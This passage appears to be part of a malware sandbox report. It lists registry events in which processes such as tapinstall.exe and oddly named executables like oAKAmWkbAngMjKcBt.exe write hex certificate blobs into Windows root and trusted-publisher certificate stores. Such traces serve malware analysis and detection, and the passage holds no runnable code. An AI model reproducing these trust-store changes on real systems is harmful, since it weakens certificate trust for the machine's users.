Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings Exercitationem.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = eda47e9320aed701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe -
Processes:
tapinstall.exeoAKAmWkbAngMjKcBt.exevpn.tmpkahRa2R1.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d05c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3490f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 